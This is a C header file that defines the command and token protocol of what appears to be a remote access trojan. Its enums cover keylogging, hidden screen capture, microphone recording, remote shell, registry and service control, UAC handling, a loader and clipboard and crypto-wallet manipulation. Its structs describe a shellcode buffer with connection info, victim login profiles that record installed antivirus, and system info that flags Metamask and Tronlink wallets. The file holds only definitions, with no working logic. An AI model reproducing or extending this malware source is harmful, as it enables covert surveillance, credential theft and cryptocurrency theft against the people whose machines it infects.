#if !defined(AFX_MACROS_H_INCLUDED)
#define AFX_MACROS_H_INCLUDED


#define	NC_CLIENT_CONNECT		0x0001
#define	NC_CLIENT_DISCONNECT	0x0002
#define	NC_TRANSMIT				0x0003
#define	NC_RECEIVE				0x0004
#define NC_RECEIVE_COMPLETE		0x0005 
#define	NC_DIALOG_CLOSE     	0x0006

#define	MAX_WRITE_RETRY		15				    
#define	MAX_WRITE_RETRY		15					
#define MAX_SEND_BUFFER		1024*1024*3			
#define	MAX_RECV_BUFFER		(MAX_SEND_BUFFER)	
#define MAX_RSEND_MAXDATA	(MAX_SEND_BUFFER)   
	
enum
{
	
	COMMAND_SESSION = 0,			
	COMMAND_HEARTBEAT,				
	COMMAND_UNINSTALL,              
	COMMAND_RENAME_REMARK,          
	COMMAND_CHANGE_GROUP,           
	COMMAND_NEXT,					
	COMMAND_SHELL,					
	COMMAND_REG,					
	COMMAND_SPEAKER,				
	COMMAND_MIKE,					
	COMMAND_SERVER,					
	COMMAND_HOST,					
	COMMAND_KEYBOARD,				
	COMMAND_SCREEN,					
	COMMAND_FILE,					
	COMMAND_HIDESCREEN,				
	COMMAND_MOVONLINE,				
	COMMAND_EXTENSION,				
	COMMAND_CLIP,	
	COMMAND_LIST_REMOTE,
	COMMAND_PROXY_EXE,
	COMMAND_RUNLODER,
	COMMAND_UAC,
	

	
	TOKEN_LOGIN = 200,				 
	TOKEN_HEARTBEAT,				 
	TOKEN_IDLE_PC,				     
	TOKEN_BUSY_PC,				     
	TOKEN_SHELL_START,				 
	TOKEN_REGEDIT,					 
	TOKEN_SPEAK_START,				 
	TOKEN_AUDIO_START,				 
	TOKEN_SERVER_START,				 
	TOKEN_HOST_START,				 
	TOKEN_KEYBOARD_START,			 
	TOKEN_BITMAPINFO,				 
	TOKEN_DRIVE_LIST,				 
	TOKEN_BITMAPINFO_HIDE,			 
	TOKEN_ACTIVE_WINDOWS,			 
	TOKEN_ACTIVE_PLUGINS,			
	TOKEN_CLIP_START,
	TOKEN_LIST_REMOTE,
	TOKEN_RUN_SUCCESS,
	TOKEN_RUN_ERROR,
};




enum{
	COMMAND_PLUGINS_FILESIZE,
	COMMAND_PLUGINS_FILEDATA,
	COMMAND_REFURBISH_PLUGIN,
	COMMAND_START_PLUGIN,
	COMMAND_END_PLUGIN,
	COMMAND_DELETE_PLUGIN,

	TOKEN_PLUGINS_FILEDATA,
	TOKEN_PLUGINS_INFO,
	TOKEN_PLUGINS_DATA,

};

enum
{
	
	TOKEN_REG_PATH,
	TOKEN_REG_KEY,
	TOKEN_REG_NO,
	TOKEN_REG_OK,

	
	COMMAND_REG_FIND,
	COMMAND_REG_DELPATH,
	COMMAND_REG_CREATEPATH,
	COMMAND_REG_DELKEY,
	COMMAND_REG_CREATKEY,
	COMMAND_REG_RENAME,
};

enum 
{
	TOKEN_SPEAK_DATA,	     

	COMMAND_SPEAK_START,	 
	COMMAND_SPEAK_STOP       
};

enum 
{
	TOKEN_AUDIO_DATA,     
};


enum 
{
	COMMAND_SERVICE_LIST = 100,				
	COMMAND_DELETESERVERICE,				
	COMMAND_STARTSERVERICE,					
	COMMAND_STOPSERVERICE,					
	COMMAND_PAUSESERVERICE,					
	COMMAND_CONTINUESERVERICE,				
	COMMAND_CREATSERVERICE,					
	TOKEN_SERVICE_LIST,						
};

enum HOST
{
	COMMAND_MACHINE_INFO,
	COMMAND_MACHINE_PROCESS,
	COMMAND_MACHINE_NET,
	COMMAND_MACHINE_WINDOWS,
	COMMAND_MACHINE_USER_INFO,
	COMMAND_MACHINE_USER,
	COMMAND_MACHINE_SOFTWARE,
	COMMAND_MACHINE_HTML,
	COMMAND_MACHINE_MSTSC,
	COMMAND_MACHINE_STARTUP,
	COMMAND_MACHINE_HOSTS,						

	TOKEN_MACHINE_INFO,
	TOKEN_MACHINE_PROCESS,
	TOKEN_MACHINE_NET,
	TOKEN_MACHINE_WINDOWS,
	TOKEN_MACHINE_USER_INFO,
	TOKEN_MACHINE_USER,
	TOKEN_MACHINE_SOFTWARE,
	TOKEN_MACHINE_HTML,
	TOKEN_MACHINE_MSTSC,
	TOKEN_MACHINE_STARTUP,
	TOKEN_MACHINE_HOSTS,


	COMMAND_APPUNINSTALL,						
	COMMAND_WINDOW_OPERATE,						
	COMMAND_WINDOW_CLOSE,						
	COMMAND_PROCESS_KILL,						
	COMMAND_PROCESS_KILLDEL,					
	COMMAND_PROCESS_DEL,						
	COMMAND_PROCESS_FREEZING,					
	COMMAND_PROCESS_THAW,						
	COMMAND_HOSTS_SET,							
	COMMAND_WTS_DIS,							
	COMMAND_WTS_LOGOFF,							
	COMMAND_USER_ENABLE,						
	COMMAND_USER_DISABLED,						
	COMMAND_EDIT_PASS							
};

enum
{
	COMMAND_KEYBOARD_LOGSTART,			
	COMMAND_KEYBOARD_LOGSTOP,			
	COMMAND_CLIPBOARD_LOGSTART,			
	COMMAND_CLIPBOARD_LOGSTOP,			
	COMMAND_GET_LOG,					
	COMMAND_GETCLIPBOARD,
	COMMAND_SETCLIPBOARD,
	COMMAND_CLIPBOARD_DEL,				
	COMMAND_WALLET_DEL,					

	TOKEN_KEYBOARD_DATA,				
	TOKEN_CLIPBOARD_DATA,				

};

typedef struct
{
	BYTE bToken;
	char lpFileName[100];
}Sunlogin;

typedef struct
{
	char ID[100];
	char mima[100];
}SunloginID;


enum
{
	COMMAND_LIST_FILES,					
	COMMAND_DELETE_FILE,
	COMMAND_DELETE_DIRECTORY,
	COMMAND_DOWN_FILES,					
	COMMAND_CONTINUE,					
	COMMAND_CREATE_FOLDER,
	COMMAND_RENAME_FILE,
	COMMAND_STOP,
	COMMAND_SET_TRANSFER_MODE,
	COMMAND_FILE_SIZE,
	COMMAND_FILE_DATA,
	COMMAND_OPEN_FILE,					 
	COMMAND_OPEN_FILE_HIDE,				 
	COMMAND_FILES_SEARCH_START,
	COMMAND_FILES_SEARCH_STOP,
	COMMAND_FILE_EXCEPTION,
	COMMAND_SEARCH_FILE,

	TOKEN_SEARCH_FILE_LIST,
	TOKEN_SEARCH_FILE_FINISH,
	TOKEN_FILE_LIST,
	TOKEN_FILE_SIZE,
	TOKEN_FILE_DATA,
	TOKEN_TRANSFER_FINISH,
	TOKEN_GET_TRANSFER_MODE,
	TOKEN_CREATEFOLDER_FINISH,
	TOKEN_RENAME_FINISH,
	TOKEN_DELETE_FINISH,
	TOKEN_SEARCH_ADD,
	TOKEN_SEARCH_END,
	TOKEN_FILE_INFO,
	TOKEN_DATA_CONTINUE,

	
	TRANSFER_MODE_NORMAL = 0x00,	
	TRANSFER_MODE_ADDITION,			
	TRANSFER_MODE_ADDITION_ALL,		
	TRANSFER_MODE_OVERWRITE,		
	TRANSFER_MODE_OVERWRITE_ALL,	
	TRANSFER_MODE_JUMP,				
	TRANSFER_MODE_JUMP_ALL,			
	TRANSFER_MODE_CANCEL,			

};




enum
{
	COMMAND_NEXT_QUICK,
	COMMAND_FLUSH_QUICK,
	COMMAND_SCREEN_RESET_QUICK,
	COMMAND_DISABLE_AERO_QUICK,
	COMMAND_SCREEN_CTRL_ALT_DEL_QUICK,
	COMMAND_SCREEN_BLOCK_INPUT_QUICK,
	COMMAND_SCREEN_BLANK_QUICK,
	COMMAND_SCREEN_CAPTURE_LAYER_QUICK,
	COMMAND_SCREEN_GET_CLIPBOARD_QUICK,
	COMMAND_SCREEN_CONTROL_QUICK,
	COMMAND_SCREEN_SET_CLIPBOARD_QUICK,

	TOKEN_FIRSTSCREEN_QUICK,
	TOKEN_NEXTSCREEN_QUICK,
	TOKEN_CLIPBOARD_TEXT_QUICK,
	TOKEN_SIZE_QUICK,
};


enum
{
	TOKEN_FIRSTSCREEN_HIDE,
	TOKEN_NEXTSCREEN_HIDE,
	TOKEN_CLIPBOARD_TEXT_HIDE,
	TOKEN_SIZE_HIDE,
	COMMAND_NEXT_HIDE,
	COMMAND_FLUSH_HIDE,
	COMMAND_SCREEN_RESET_HIDE,
	COMMAND_SCREEN_CTRL_ALT_DEL_HIDE,
	COMMAND_SCREEN_CAPTURE_LAYER_HIDE,
	COMMAND_SCREEN_GET_CLIPBOARD_HIDE,
	COMMAND_SCREEN_CONTROL_HIDE,
	COMMAND_SCREEN_SET_CLIPBOARD_HIDE,
	COMMAND_HIDE_USER,
};



typedef struct
{
	BYTE		     bToken;			
	char	         loadlip[130];	    
	char			 HostName[50];  	
	char			 userName[50];		
	DWORD			 pid;
	char             szInsTime[64];     
	char             szAntiVirus[128];  
	char             szGroup[64];
	bool             bUAC;
	char			 ProName[MAX_PATH];	 
	DWORD            dwSpeed;            
	SYSTEMTIME		 Time;				 

}LOGININFO;


struct CONNECT_INFO
{
	int  nPort;
	char szHost[256];
};

struct MYtagMSG { 


	UINT        lParam;
	UINT        message;
	long long      wParam;
	int x;
	int y;
};


typedef struct
{
	BYTE shellcode[1200];
	CONNECT_INFO connect_info;
	int Filelen;
	BYTE File;
}ShellcodeStr;


struct tagSystemInfo
{
	char  Os[128];					 
	char  szCpuInfo[128];			 
	char  szMac[100];				 
	MEMORYSTATUSEX szMemory;		 
	DWORD szDriveSize;			     
	char  szScrSize[32];			 
	char  szGraphics[128];			 
	bool  Metemask;					 
	bool  Tronlink;					 
	DWORD mstsc;					 
	char  Program[256];				 
	char  szActiveTime[128];		 
};

#endif 